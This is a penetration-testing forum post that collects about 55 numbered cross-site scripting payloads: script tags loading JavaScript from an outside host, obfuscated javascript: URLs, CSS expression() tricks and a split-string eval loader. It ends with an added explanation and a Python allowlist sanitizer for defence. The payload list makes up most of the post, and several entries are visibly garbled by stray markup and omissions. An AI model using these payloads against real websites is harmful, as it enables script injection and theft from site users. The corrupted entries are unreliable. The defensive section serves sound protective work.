中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: XSS attack roundup

Author: admin    Time: 2016-4-28 10:06
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>
(11) Embedded tab splitting "javascript"

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting "javascript"

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Defeating a character limit (all fragments must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective here in China, because there is nowhere to make use of them)

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping a JavaScript string filter

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
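Most of the entries above fall into two families. The first is a URL-typed value (SRC, HREF, BACKGROUND, CSS url()) carrying a `javascript:` scheme disguised by case, by character references with or without semicolons, by embedded tabs, newlines or carriage returns, or by leading whitespace and null bytes (items 3 to 19, 32 to 46). The second is a tag or attribute the application never meant to allow: script tags, on* handlers, STYLE with expression(), IFRAME, BASE, EMBED (items 1, 20 to 27, 48 to 55). The defence that survives all of them is to normalise the value the way the browser will and then allowlist, rather than to blocklist strings. The Python below is an added example written for this page, not code from the post or from any library: `normalize_url` and `is_safe_url` allowlist the URL scheme after undoing the obfuscations, and `AllowlistSanitizer` parses untrusted HTML with the standard-library `html.parser` and re-serialises only the tags and attributes in a hypothetical allowlist, so unknown tags, event handlers and style attributes never reach the output. The allowlist, the sample inputs under `__main__` and all function names are the example's own.

```python
# Added example: normalise URL-typed values the way a browser does, then sanitise
# HTML against an allowlist. Not code from the original post or any library.
import html
import re
from html.parser import HTMLParser
from typing import Optional

SAFE_SCHEMES = {"http", "https", "mailto"}
# Hypothetical per-application allowlist: tag -> attributes it may keep.
ALLOWED_TAGS = {"a": {"href", "title"}, "b": set(), "i": set(), "p": set(),
                "ul": set(), "li": set(), "br": set(), "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"img", "br"}
DROP_WITH_CONTENT = {"script", "style"}   # the element and its text are both removed


def normalize_url(raw: str) -> str:
    # Undo the scheme obfuscations of items 3-19 before looking at the scheme.
    s = html.unescape(raw)                  # &#106; &#x6A &#0000106 -> 'j', with or without ';'
    s = re.sub(r"[\t\n\r]", "", s)          # tab, LF and CR are ignored anywhere in a URL
    s = s.replace("\x00", "")               # legacy parsers also ignored NUL (items 17-18)
    return s.strip("".join(chr(c) for c in range(0x21)))   # leading/trailing space and C0 controls


def scheme_of(url: str) -> Optional[str]:
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):", url)
    return m.group(1).lower() if m else None   # None: relative URL, no scheme at all


def is_safe_url(raw: str) -> bool:
    # Allowlist the scheme; javascript:, vbscript:, data: and anything unknown are rejected.
    scheme = scheme_of(normalize_url(raw))
    return scheme is None or scheme in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    # Parses untrusted HTML and re-serialises only allowlisted tags and attributes.

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.dropping = None      # name of the script/style element whose content is being skipped

    def handle_starttag(self, tag, attrs):
        if self.dropping:
            return
        if tag in DROP_WITH_CONTENT:
            self.dropping = tag
            return
        allowed = ALLOWED_TAGS.get(tag)
        if allowed is None:       # <XSS>, <zzz>, <iframe>, <base>, <embed>...: tag gone, its text kept
            return
        parts = [tag]
        for name, value in attrs:
            if name not in allowed or value is None:      # drops every on* handler and STYLE
                continue
            if name in URL_ATTRS and not is_safe_url(value):
                continue
            parts.append('%s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s>" % " ".join(parts))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.dropping:
            if tag == self.dropping:
                self.dropping = None
            return
        if tag in self.open_tags:
            while True:           # also closes anything left open inside this element
                top = self.open_tags.pop()
                self.out.append("</%s>" % top)
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.dropping:     # text is always re-encoded, never copied through
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    p = AllowlistSanitizer()
    p.feed(fragment)
    return p.result()


if __name__ == "__main__":
    # Constructed samples in the shape of the page's entries.
    for raw in ("JaVaScRiPt:alert('XSS')", "jav&#x09;ascript:alert('XSS')", "http://example.com/"):
        print("%-35r safe=%s" % (raw, is_safe_url(raw)))
    print(sanitize('<a href="&#106;avascript:alert(1)" onclick="alert(1)">click</a><zzz onclick=alert`1`>me</zzz>'))
```

Two design points are worth keeping. The sanitiser emits its own well-formed markup from the parse result instead of echoing the original bytes, which is what closes the malformed-markup tricks of items 23 to 27; and because `html.unescape` decodes numeric references with or without the trailing semicolon, items 8 to 10 decode to the same `javascript:` the browser would see. The allowlist is deliberately small: widen it per application rather than adding patterns to reject.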





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2